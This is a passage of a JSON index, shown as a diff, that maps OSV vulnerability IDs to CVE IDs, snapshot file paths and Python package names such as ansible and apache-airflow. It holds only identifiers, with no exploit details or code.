|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{
|
| 2 |
+
"count": 200,
|
| 3 |
+
"snapshots": [
|
| 4 |
+
{
|
| 5 |
+
"osv_id": "PYSEC-2013-1",
|
| 6 |
+
"file": "data/snapshots/PYSEC-2013-1.json",
|
| 7 |
+
"cve_id": "CVE-2013-4259",
|
| 8 |
+
"package": "ansible"
|
| 9 |
+
},
|
| 10 |
+
{
|
| 11 |
+
"osv_id": "PYSEC-2013-2",
|
| 12 |
+
"file": "data/snapshots/PYSEC-2013-2.json",
|
| 13 |
+
"cve_id": "CVE-2013-4260",
|
| 14 |
+
"package": "ansible"
|
| 15 |
+
},
|
| 16 |
+
{
|
| 17 |
+
"osv_id": "PYSEC-2014-98",
|
| 18 |
+
"file": "data/snapshots/PYSEC-2014-98.json",
|
| 19 |
+
"cve_id": "CVE-2014-2260",
|
| 20 |
+
"package": "ajenti"
|
| 21 |
+
},
|
| 22 |
+
{
|
| 23 |
+
"osv_id": "PYSEC-2014-99",
|
| 24 |
+
"file": "data/snapshots/PYSEC-2014-99.json",
|
| 25 |
+
"cve_id": "CVE-2014-4301",
|
| 26 |
+
"package": "ajenti"
|
| 27 |
+
},
|
| 28 |
+
{
|
| 29 |
+
"osv_id": "PYSEC-2015-1",
|
| 30 |
+
"file": "data/snapshots/PYSEC-2015-1.json",
|
| 31 |
+
"cve_id": "CVE-2015-3908",
|
| 32 |
+
"package": "ansible"
|
| 33 |
+
},
|
| 34 |
+
{
|
| 35 |
+
"osv_id": "PYSEC-2016-1",
|
| 36 |
+
"file": "data/snapshots/PYSEC-2016-1.json",
|
| 37 |
+
"cve_id": "CVE-2016-3096",
|
| 38 |
+
"package": "ansible"
|
| 39 |
+
},
|
| 40 |
+
{
|
| 41 |
+
"osv_id": "PYSEC-2017-105",
|
| 42 |
+
"file": "data/snapshots/PYSEC-2017-105.json",
|
| 43 |
+
"cve_id": "CVE-2016-8752",
|
| 44 |
+
"package": "apache-atlas"
|
| 45 |
+
},
|
| 46 |
+
{
|
| 47 |
+
"osv_id": "PYSEC-2017-106",
|
| 48 |
+
"file": "data/snapshots/PYSEC-2017-106.json",
|
| 49 |
+
"cve_id": "CVE-2017-3150",
|
| 50 |
+
"package": "apache-atlas"
|
| 51 |
+
},
|
| 52 |
+
{
|
| 53 |
+
"osv_id": "PYSEC-2017-107",
|
| 54 |
+
"file": "data/snapshots/PYSEC-2017-107.json",
|
| 55 |
+
"cve_id": "CVE-2017-3151",
|
| 56 |
+
"package": "apache-atlas"
|
| 57 |
+
},
|
| 58 |
+
{
|
| 59 |
+
"osv_id": "PYSEC-2017-108",
|
| 60 |
+
"file": "data/snapshots/PYSEC-2017-108.json",
|
| 61 |
+
"cve_id": "CVE-2017-3152",
|
| 62 |
+
"package": "apache-atlas"
|
| 63 |
+
},
|
| 64 |
+
{
|
| 65 |
+
"osv_id": "PYSEC-2017-109",
|
| 66 |
+
"file": "data/snapshots/PYSEC-2017-109.json",
|
| 67 |
+
"cve_id": "CVE-2017-3153",
|
| 68 |
+
"package": "apache-atlas"
|
| 69 |
+
},
|
| 70 |
+
{
|
| 71 |
+
"osv_id": "PYSEC-2017-110",
|
| 72 |
+
"file": "data/snapshots/PYSEC-2017-110.json",
|
| 73 |
+
"cve_id": "CVE-2017-3154",
|
| 74 |
+
"package": "apache-atlas"
|
| 75 |
+
},
|
| 76 |
+
{
|
| 77 |
+
"osv_id": "PYSEC-2017-111",
|
| 78 |
+
"file": "data/snapshots/PYSEC-2017-111.json",
|
| 79 |
+
"cve_id": "CVE-2017-3155",
|
| 80 |
+
"package": "apache-atlas"
|
| 81 |
+
},
|
| 82 |
+
{
|
| 83 |
+
"osv_id": "PYSEC-2017-2",
|
| 84 |
+
"file": "data/snapshots/PYSEC-2017-2.json",
|
| 85 |
+
"cve_id": "CVE-2014-3498",
|
| 86 |
+
"package": "ansible"
|
| 87 |
+
},
|
| 88 |
+
{
|
| 89 |
+
"osv_id": "PYSEC-2017-3",
|
| 90 |
+
"file": "data/snapshots/PYSEC-2017-3.json",
|
| 91 |
+
"cve_id": "CVE-2015-6240",
|
| 92 |
+
"package": "ansible"
|
| 93 |
+
},
|
| 94 |
+
{
|
| 95 |
+
"osv_id": "PYSEC-2017-4",
|
| 96 |
+
"file": "data/snapshots/PYSEC-2017-4.json",
|
| 97 |
+
"cve_id": "CVE-2017-7550",
|
| 98 |
+
"package": "ansible"
|
| 99 |
+
},
|
| 100 |
+
{
|
| 101 |
+
"osv_id": "PYSEC-2017-5",
|
| 102 |
+
"file": "data/snapshots/PYSEC-2017-5.json",
|
| 103 |
+
"cve_id": "CVE-2017-2809",
|
| 104 |
+
"package": "ansible-vault"
|
| 105 |
+
},
|
| 106 |
+
{
|
| 107 |
+
"osv_id": "PYSEC-2018-107",
|
| 108 |
+
"file": "data/snapshots/PYSEC-2018-107.json",
|
| 109 |
+
"cve_id": "CVE-2018-18548",
|
| 110 |
+
"package": "ajenti"
|
| 111 |
+
},
|
| 112 |
+
{
|
| 113 |
+
"osv_id": "PYSEC-2018-109",
|
| 114 |
+
"file": "data/snapshots/PYSEC-2018-109.json",
|
| 115 |
+
"cve_id": "CVE-2018-1000080",
|
| 116 |
+
"package": "ajenti-panel"
|
| 117 |
+
},
|
| 118 |
+
{
|
| 119 |
+
"osv_id": "PYSEC-2018-110",
|
| 120 |
+
"file": "data/snapshots/PYSEC-2018-110.json",
|
| 121 |
+
"cve_id": "CVE-2018-1000081",
|
| 122 |
+
"package": "ajenti-panel"
|
| 123 |
+
},
|
| 124 |
+
{
|
| 125 |
+
"osv_id": "PYSEC-2018-111",
|
| 126 |
+
"file": "data/snapshots/PYSEC-2018-111.json",
|
| 127 |
+
"cve_id": "CVE-2018-1000082",
|
| 128 |
+
"package": "ajenti-panel"
|
| 129 |
+
},
|
| 130 |
+
{
|
| 131 |
+
"osv_id": "PYSEC-2018-112",
|
| 132 |
+
"file": "data/snapshots/PYSEC-2018-112.json",
|
| 133 |
+
"cve_id": "CVE-2018-1000083",
|
| 134 |
+
"package": "ajenti-panel"
|
| 135 |
+
},
|
| 136 |
+
{
|
| 137 |
+
"osv_id": "PYSEC-2018-113",
|
| 138 |
+
"file": "data/snapshots/PYSEC-2018-113.json",
|
| 139 |
+
"cve_id": "CVE-2018-1000126",
|
| 140 |
+
"package": "ajenti-panel"
|
| 141 |
+
},
|
| 142 |
+
{
|
| 143 |
+
"osv_id": "PYSEC-2018-35",
|
| 144 |
+
"file": "data/snapshots/PYSEC-2018-35.json",
|
| 145 |
+
"cve_id": "CVE-2018-1000814",
|
| 146 |
+
"package": "aiohttp-session"
|
| 147 |
+
},
|
| 148 |
+
{
|
| 149 |
+
"osv_id": "PYSEC-2018-36",
|
| 150 |
+
"file": "data/snapshots/PYSEC-2018-36.json",
|
| 151 |
+
"cve_id": "CVE-2013-2233",
|
| 152 |
+
"package": "ansible"
|
| 153 |
+
},
|
| 154 |
+
{
|
| 155 |
+
"osv_id": "PYSEC-2018-37",
|
| 156 |
+
"file": "data/snapshots/PYSEC-2018-37.json",
|
| 157 |
+
"cve_id": "CVE-2016-8614",
|
| 158 |
+
"package": "ansible"
|
| 159 |
+
},
|
| 160 |
+
{
|
| 161 |
+
"osv_id": "PYSEC-2018-38",
|
| 162 |
+
"file": "data/snapshots/PYSEC-2018-38.json",
|
| 163 |
+
"cve_id": "CVE-2016-8628",
|
| 164 |
+
"package": "ansible"
|
| 165 |
+
},
|
| 166 |
+
{
|
| 167 |
+
"osv_id": "PYSEC-2018-39",
|
| 168 |
+
"file": "data/snapshots/PYSEC-2018-39.json",
|
| 169 |
+
"cve_id": "CVE-2016-9587",
|
| 170 |
+
"package": "ansible"
|
| 171 |
+
},
|
| 172 |
+
{
|
| 173 |
+
"osv_id": "PYSEC-2018-40",
|
| 174 |
+
"file": "data/snapshots/PYSEC-2018-40.json",
|
| 175 |
+
"cve_id": "CVE-2017-7466",
|
| 176 |
+
"package": "ansible"
|
| 177 |
+
},
|
| 178 |
+
{
|
| 179 |
+
"osv_id": "PYSEC-2018-41",
|
| 180 |
+
"file": "data/snapshots/PYSEC-2018-41.json",
|
| 181 |
+
"cve_id": "CVE-2017-7481",
|
| 182 |
+
"package": "ansible"
|
| 183 |
+
},
|
| 184 |
+
{
|
| 185 |
+
"osv_id": "PYSEC-2018-42",
|
| 186 |
+
"file": "data/snapshots/PYSEC-2018-42.json",
|
| 187 |
+
"cve_id": "CVE-2018-10855",
|
| 188 |
+
"package": "ansible"
|
| 189 |
+
},
|
| 190 |
+
{
|
| 191 |
+
"osv_id": "PYSEC-2018-43",
|
| 192 |
+
"file": "data/snapshots/PYSEC-2018-43.json",
|
| 193 |
+
"cve_id": "CVE-2018-10875",
|
| 194 |
+
"package": "ansible"
|
| 195 |
+
},
|
| 196 |
+
{
|
| 197 |
+
"osv_id": "PYSEC-2018-44",
|
| 198 |
+
"file": "data/snapshots/PYSEC-2018-44.json",
|
| 199 |
+
"cve_id": "CVE-2018-16837",
|
| 200 |
+
"package": "ansible"
|
| 201 |
+
},
|
| 202 |
+
{
|
| 203 |
+
"osv_id": "PYSEC-2018-45",
|
| 204 |
+
"file": "data/snapshots/PYSEC-2018-45.json",
|
| 205 |
+
"cve_id": "CVE-2017-12614",
|
| 206 |
+
"package": "apache-airflow"
|
| 207 |
+
},
|
| 208 |
+
{
|
| 209 |
+
"osv_id": "PYSEC-2018-58",
|
| 210 |
+
"file": "data/snapshots/PYSEC-2018-58.json",
|
| 211 |
+
"cve_id": "CVE-2016-8647",
|
| 212 |
+
"package": "ansible"
|
| 213 |
+
},
|
| 214 |
+
{
|
| 215 |
+
"osv_id": "PYSEC-2018-60",
|
| 216 |
+
"file": "data/snapshots/PYSEC-2018-60.json",
|
| 217 |
+
"cve_id": "CVE-2018-16859",
|
| 218 |
+
"package": "ansible"
|
| 219 |
+
},
|
| 220 |
+
{
|
| 221 |
+
"osv_id": "PYSEC-2018-80",
|
| 222 |
+
"file": "data/snapshots/PYSEC-2018-80.json",
|
| 223 |
+
"cve_id": "CVE-2018-1000519",
|
| 224 |
+
"package": "aiohttp-session"
|
| 225 |
+
},
|
| 226 |
+
{
|
| 227 |
+
"osv_id": "PYSEC-2018-81",
|
| 228 |
+
"file": "data/snapshots/PYSEC-2018-81.json",
|
| 229 |
+
"cve_id": "CVE-2018-10874",
|
| 230 |
+
"package": "ansible"
|
| 231 |
+
},
|
| 232 |
+
{
|
| 233 |
+
"osv_id": "PYSEC-2019-1",
|
| 234 |
+
"file": "data/snapshots/PYSEC-2019-1.json",
|
| 235 |
+
"cve_id": "CVE-2019-1000007",
|
| 236 |
+
"package": "aioxmpp"
|
| 237 |
+
},
|
| 238 |
+
{
|
| 239 |
+
"osv_id": "PYSEC-2019-141",
|
| 240 |
+
"file": "data/snapshots/PYSEC-2019-141.json",
|
| 241 |
+
"cve_id": "CVE-2018-16876",
|
| 242 |
+
"package": "ansible"
|
| 243 |
+
},
|
| 244 |
+
{
|
| 245 |
+
"osv_id": "PYSEC-2019-142",
|
| 246 |
+
"file": "data/snapshots/PYSEC-2019-142.json",
|
| 247 |
+
"cve_id": "CVE-2018-20244",
|
| 248 |
+
"package": "apache-airflow"
|
| 249 |
+
},
|
| 250 |
+
{
|
| 251 |
+
"osv_id": "PYSEC-2019-143",
|
| 252 |
+
"file": "data/snapshots/PYSEC-2019-143.json",
|
| 253 |
+
"cve_id": "CVE-2018-20245",
|
| 254 |
+
"package": "apache-airflow"
|
| 255 |
+
},
|
| 256 |
+
{
|
| 257 |
+
"osv_id": "PYSEC-2019-145",
|
| 258 |
+
"file": "data/snapshots/PYSEC-2019-145.json",
|
| 259 |
+
"cve_id": "CVE-2019-10206",
|
| 260 |
+
"package": "ansible"
|
| 261 |
+
},
|
| 262 |
+
{
|
| 263 |
+
"osv_id": "PYSEC-2019-146",
|
| 264 |
+
"file": "data/snapshots/PYSEC-2019-146.json",
|
| 265 |
+
"cve_id": "CVE-2019-14856",
|
| 266 |
+
"package": "ansible"
|
| 267 |
+
},
|
| 268 |
+
{
|
| 269 |
+
"osv_id": "PYSEC-2019-147",
|
| 270 |
+
"file": "data/snapshots/PYSEC-2019-147.json",
|
| 271 |
+
"cve_id": "CVE-2017-15720",
|
| 272 |
+
"package": "apache-airflow"
|
| 273 |
+
},
|
| 274 |
+
{
|
| 275 |
+
"osv_id": "PYSEC-2019-148",
|
| 276 |
+
"file": "data/snapshots/PYSEC-2019-148.json",
|
| 277 |
+
"cve_id": "CVE-2017-17835",
|
| 278 |
+
"package": "apache-airflow"
|
| 279 |
+
},
|
| 280 |
+
{
|
| 281 |
+
"osv_id": "PYSEC-2019-149",
|
| 282 |
+
"file": "data/snapshots/PYSEC-2019-149.json",
|
| 283 |
+
"cve_id": "CVE-2017-17836",
|
| 284 |
+
"package": "apache-airflow"
|
| 285 |
+
},
|
| 286 |
+
{
|
| 287 |
+
"osv_id": "PYSEC-2019-171",
|
| 288 |
+
"file": "data/snapshots/PYSEC-2019-171.json",
|
| 289 |
+
"cve_id": "CVE-2019-14858",
|
| 290 |
+
"package": "ansible"
|
| 291 |
+
},
|
| 292 |
+
{
|
| 293 |
+
"osv_id": "PYSEC-2019-2",
|
| 294 |
+
"file": "data/snapshots/PYSEC-2019-2.json",
|
| 295 |
+
"cve_id": "CVE-2019-10156",
|
| 296 |
+
"package": "ansible"
|
| 297 |
+
},
|
| 298 |
+
{
|
| 299 |
+
"osv_id": "PYSEC-2019-214",
|
| 300 |
+
"file": "data/snapshots/PYSEC-2019-214.json",
|
| 301 |
+
"cve_id": "CVE-2019-0216",
|
| 302 |
+
"package": "apache-airflow"
|
| 303 |
+
},
|
| 304 |
+
{
|
| 305 |
+
"osv_id": "PYSEC-2019-215",
|
| 306 |
+
"file": "data/snapshots/PYSEC-2019-215.json",
|
| 307 |
+
"cve_id": "CVE-2019-0229",
|
| 308 |
+
"package": "apache-airflow"
|
| 309 |
+
},
|
| 310 |
+
{
|
| 311 |
+
"osv_id": "PYSEC-2019-216",
|
| 312 |
+
"file": "data/snapshots/PYSEC-2019-216.json",
|
| 313 |
+
"cve_id": "CVE-2019-12417",
|
| 314 |
+
"package": "apache-airflow"
|
| 315 |
+
},
|
| 316 |
+
{
|
| 317 |
+
"osv_id": "PYSEC-2019-3",
|
| 318 |
+
"file": "data/snapshots/PYSEC-2019-3.json",
|
| 319 |
+
"cve_id": "CVE-2019-10217",
|
| 320 |
+
"package": "ansible"
|
| 321 |
+
},
|
| 322 |
+
{
|
| 323 |
+
"osv_id": "PYSEC-2019-4",
|
| 324 |
+
"file": "data/snapshots/PYSEC-2019-4.json",
|
| 325 |
+
"cve_id": "CVE-2019-14846",
|
| 326 |
+
"package": "ansible"
|
| 327 |
+
},
|
| 328 |
+
{
|
| 329 |
+
"osv_id": "PYSEC-2019-5",
|
| 330 |
+
"file": "data/snapshots/PYSEC-2019-5.json",
|
| 331 |
+
"cve_id": "CVE-2019-3828",
|
| 332 |
+
"package": "ansible"
|
| 333 |
+
},
|
| 334 |
+
{
|
| 335 |
+
"osv_id": "PYSEC-2020-1",
|
| 336 |
+
"file": "data/snapshots/PYSEC-2020-1.json",
|
| 337 |
+
"cve_id": "CVE-2020-10685",
|
| 338 |
+
"package": "ansible"
|
| 339 |
+
},
|
| 340 |
+
{
|
| 341 |
+
"osv_id": "PYSEC-2020-10",
|
| 342 |
+
"file": "data/snapshots/PYSEC-2020-10.json",
|
| 343 |
+
"cve_id": "CVE-2020-1738",
|
| 344 |
+
"package": "ansible"
|
| 345 |
+
},
|
| 346 |
+
{
|
| 347 |
+
"osv_id": "PYSEC-2020-11",
|
| 348 |
+
"file": "data/snapshots/PYSEC-2020-11.json",
|
| 349 |
+
"cve_id": "CVE-2020-1739",
|
| 350 |
+
"package": "ansible"
|
| 351 |
+
},
|
| 352 |
+
{
|
| 353 |
+
"osv_id": "PYSEC-2020-12",
|
| 354 |
+
"file": "data/snapshots/PYSEC-2020-12.json",
|
| 355 |
+
"cve_id": "CVE-2020-1740",
|
| 356 |
+
"package": "ansible"
|
| 357 |
+
},
|
| 358 |
+
{
|
| 359 |
+
"osv_id": "PYSEC-2020-13",
|
| 360 |
+
"file": "data/snapshots/PYSEC-2020-13.json",
|
| 361 |
+
"cve_id": "CVE-2020-1746",
|
| 362 |
+
"package": "ansible"
|
| 363 |
+
},
|
| 364 |
+
{
|
| 365 |
+
"osv_id": "PYSEC-2020-14",
|
| 366 |
+
"file": "data/snapshots/PYSEC-2020-14.json",
|
| 367 |
+
"cve_id": "CVE-2020-11978",
|
| 368 |
+
"package": "apache-airflow"
|
| 369 |
+
},
|
| 370 |
+
{
|
| 371 |
+
"osv_id": "PYSEC-2020-15",
|
| 372 |
+
"file": "data/snapshots/PYSEC-2020-15.json",
|
| 373 |
+
"cve_id": "CVE-2020-11981",
|
| 374 |
+
"package": "apache-airflow"
|
| 375 |
+
},
|
| 376 |
+
{
|
| 377 |
+
"osv_id": "PYSEC-2020-159",
|
| 378 |
+
"file": "data/snapshots/PYSEC-2020-159.json",
|
| 379 |
+
"cve_id": "CVE-2020-26214",
|
| 380 |
+
"package": "alerta-server"
|
| 381 |
+
},
|
| 382 |
+
{
|
| 383 |
+
"osv_id": "PYSEC-2020-16",
|
| 384 |
+
"file": "data/snapshots/PYSEC-2020-16.json",
|
| 385 |
+
"cve_id": "CVE-2020-11982",
|
| 386 |
+
"package": "apache-airflow"
|
| 387 |
+
},
|
| 388 |
+
{
|
| 389 |
+
"osv_id": "PYSEC-2020-160",
|
| 390 |
+
"file": "data/snapshots/PYSEC-2020-160.json",
|
| 391 |
+
"cve_id": "CVE-2019-14864",
|
| 392 |
+
"package": "ansible"
|
| 393 |
+
},
|
| 394 |
+
{
|
| 395 |
+
"osv_id": "PYSEC-2020-161",
|
| 396 |
+
"file": "data/snapshots/PYSEC-2020-161.json",
|
| 397 |
+
"cve_id": "CVE-2019-14904",
|
| 398 |
+
"package": "ansible"
|
| 399 |
+
},
|
| 400 |
+
{
|
| 401 |
+
"osv_id": "PYSEC-2020-162",
|
| 402 |
+
"file": "data/snapshots/PYSEC-2020-162.json",
|
| 403 |
+
"cve_id": "CVE-2019-12398",
|
| 404 |
+
"package": "apache-airflow"
|
| 405 |
+
},
|
| 406 |
+
{
|
| 407 |
+
"osv_id": "PYSEC-2020-17",
|
| 408 |
+
"file": "data/snapshots/PYSEC-2020-17.json",
|
| 409 |
+
"cve_id": "CVE-2020-11983",
|
| 410 |
+
"package": "apache-airflow"
|
| 411 |
+
},
|
| 412 |
+
{
|
| 413 |
+
"osv_id": "PYSEC-2020-18",
|
| 414 |
+
"file": "data/snapshots/PYSEC-2020-18.json",
|
| 415 |
+
"cve_id": "CVE-2020-13927",
|
| 416 |
+
"package": "apache-airflow"
|
| 417 |
+
},
|
| 418 |
+
{
|
| 419 |
+
"osv_id": "PYSEC-2020-19",
|
| 420 |
+
"file": "data/snapshots/PYSEC-2020-19.json",
|
| 421 |
+
"cve_id": "CVE-2020-13944",
|
| 422 |
+
"package": "apache-airflow"
|
| 423 |
+
},
|
| 424 |
+
{
|
| 425 |
+
"osv_id": "PYSEC-2020-198",
|
| 426 |
+
"file": "data/snapshots/PYSEC-2020-198.json",
|
| 427 |
+
"cve_id": "CVE-2014-2686",
|
| 428 |
+
"package": "ansible"
|
| 429 |
+
},
|
| 430 |
+
{
|
| 431 |
+
"osv_id": "PYSEC-2020-199",
|
| 432 |
+
"file": "data/snapshots/PYSEC-2020-199.json",
|
| 433 |
+
"cve_id": "CVE-2014-4657",
|
| 434 |
+
"package": "ansible"
|
| 435 |
+
},
|
| 436 |
